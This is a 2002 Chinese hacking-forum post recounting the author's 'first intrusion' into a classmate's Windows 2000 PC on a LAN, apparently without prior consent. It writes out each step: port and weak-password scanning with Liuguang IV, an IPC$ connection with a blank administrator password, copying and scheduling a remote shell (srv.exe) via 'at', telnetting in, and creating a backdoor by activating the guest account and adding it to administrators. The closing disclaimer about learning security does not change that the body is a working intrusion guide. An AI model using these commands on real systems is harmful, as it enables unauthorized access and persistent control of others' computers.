鬼烧 
  
级别:老 站 友
威望:2
经验:0
货币:1521
体力:
来源:广西
总发帖数:443
注册日期:2002-02-14 |
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
我是一个很笨的菜鸟,在网上和前辈们学习了很久了,但一直以来都没什么机会对网上的机子做些什么,一个原因是我用的是猫,速度太慢,第二是我还是学生,晚上11点宿舍就没电了,做事不方便,所以一直以来也就能用扫描器扫一下端口,扫一些弱密码而已,还没真正入侵到别人的机子里去过,今天终于如愿以偿,同过用IP$空连接进到别人的电脑里,呵呵,不过是局域网,因为我是菜鸟嘛,所以先从局域网开始练起,出了什么错也不用负什么责任,大不了请同学吃一餐咯,:),好了,废话少说,开始进如正题
准备工具:流光IV;操作系统:我的是WIN2000专业版,对方的也是(是后来去问的)。
流光的使用方法我想就不用怎么讲了,有很多教程的。打开流光后,按CTRL+R,出现了主机扫描设置,在要扫描的IP段了填上我要扫的局域网的IP段,开始地址:192.168.0.1,结束地址:192.168.0.150,扫描主机类型:NT/98。由于是个人用户的机子,所以我们把“将FRONTPAGE主机自动加如HTTP主机列表”前的勾去掉,然后点确定。现在可以去抽只烟了,要不上个厕所也行……
好了,扫描结果出来了,我扫到了6台机子,现在可以对每台机子进行详细的探测了,对列表中的电脑单击右键,选中“探测IP$用户列表”,把里面的两个选项勾上,在在先面的选项里把“如果主机不允许,将强制从文件里导出”前的勾去掉(为了速度快一点),然后点确定,过一会,结果出来了,如果出现“和主机192.168.0.50连接失败,或者没有启动RPC服务。”就是说对方的机子是98或者不是NT,放弃,我的目标是NT(因为98我不知道怎么下手,望高手指导)。如果出现密码猜解的过程,那就是我们的目标NT或者2OOO了,这个时候我探测到192.168.0.77的ADMINISTRATOR的密码是空,流光会报告说探测到一个密码。
现在我们得到了一个机子的密码了,就可以用IPc$空连接进如对方的电脑了,打开CMD,输入:
d:\net
use \\192.168.0.77\ipc$ "" \user: "adminstrator"
回车,出现“命令成功完成”,OK,进了,呵呵
现在要想对他进行控制,我们把SRV放上去,在流光的TOOLS文件夹里,我把他放在E盘的根目录下了
e:\tools>copy srv.exe \\192.168.0.77\admin$ \system32 回车
已复制一个文件(呵呵,得手了)
现在要把刚才放进去的东东给启动了,先看下对方的时间:
e:\tools>net time \\192.168.0.77 回车
\\192.168.0.77
的当前时间是2002/3/14 下午 06:15
命令完成
好,我要在6:17分把SRV给启动了,
e:\tools>at \\192.168.0.77 18:17 srv.exe 回车
新加了一项业务,其作业ID=1
(注意哦,如果对方的时间是在下午,要换为24小时制的,比如上面的6点就要换为18点,否则就是第二天上午的6点才把SRV启动哦)
OK,SRV已经启动了,现在可以进去了,:)
e:\tools>telnet 192.168.0.77
99(99是SRV的指定端口) 回车
好了,进了,现在我要给自己留个后门,相信这个方法很多前辈都介绍过了,不过我还是要说一下,就当是复习吧,其实我在刚学这些指令的时候一直有个疑问,就是TELNET
进到对方的电脑后我能干什么,现在明白了,进了后就象在自己的电脑上一样,用DOS的命令进行操作,不过要有一定的权限,象现在我有了管理员的权限,当然想干什么就干什么了:),先给自己创建个合法用户
c:\system32>net user guest/active: yes 回车
the command
is completed successfuly.(把gues这个用户激活)
c:\system32>net user
guest 111回车
net user guest 111
the command is completed
succesfuly.
现在把guest这个用户填加到管理员组
c:\system32>net
localgroup administrators guest / add
net localgroup
administrators guest/add
the command is completed succesfuly.
好了,后门OK了,接下来做什么呢,我暂时还不知道:(,因为对方的电脑不是服务器,所以没开23端口,不是什么时候都能进去的,每次要进去都先要把SRV给启动,所以有点麻烦,而且SRV已经被杀毒软件视为病毒了,很容易就会被杀掉,所以…………
*******************************************************************************************
这里我还有点问题,望高手指教下,我把SRV启动后,TELNET上后为什么在上面打指令都看不见我打的指令,而是回车后才看见,我都是摸黑打的,错了好多:(
还有,什么帮对方打开23这个端口这样以后进去就方便多了。
小结:这是我的第一次入侵,我很菜,用了一个下午才搞掂,但毕竟这是第一步。我不太喜欢用木马,没什么意思,所以我进去后不知道要干什么,同学的电脑当然不能乱搞了,主要是熟悉下指令和整个过程,所以我建议有条件的菜鸟要想学的话最好是在局域网里实践下,当然,在局域网里和网上是不一样的,在局域网里的速度比网上的速度快多了,所以在输入指令的时候不会有太大的延迟。
写这篇文章不是为了教和我一样的菜鸟去黑别人的电脑,要记住,学习这些技术不是为了黑别人,而是为了维护网络安全(好象口气大了点),毕竟黑别人不是一个黑客应有的想法。
这是我第一次写入侵过程,写得不好,做得也不是很好,望高手们多多指点。
这篇文章在黑客技术论坛上也帖了,在这里又帖出来是为了让更多的高手指导,一定要告诉我为什么我在用SRV连接后无法看到我打出的指令,谢谢
|
首页 
小榕软件实验室 
刀光雪影 
菜鸟的第一次入侵(局域网篇) 
将此页发给您的朋友
编辑
删除
发表于
2002-03-15.20:49:32 
IP: 
.files\star1(1).gif)
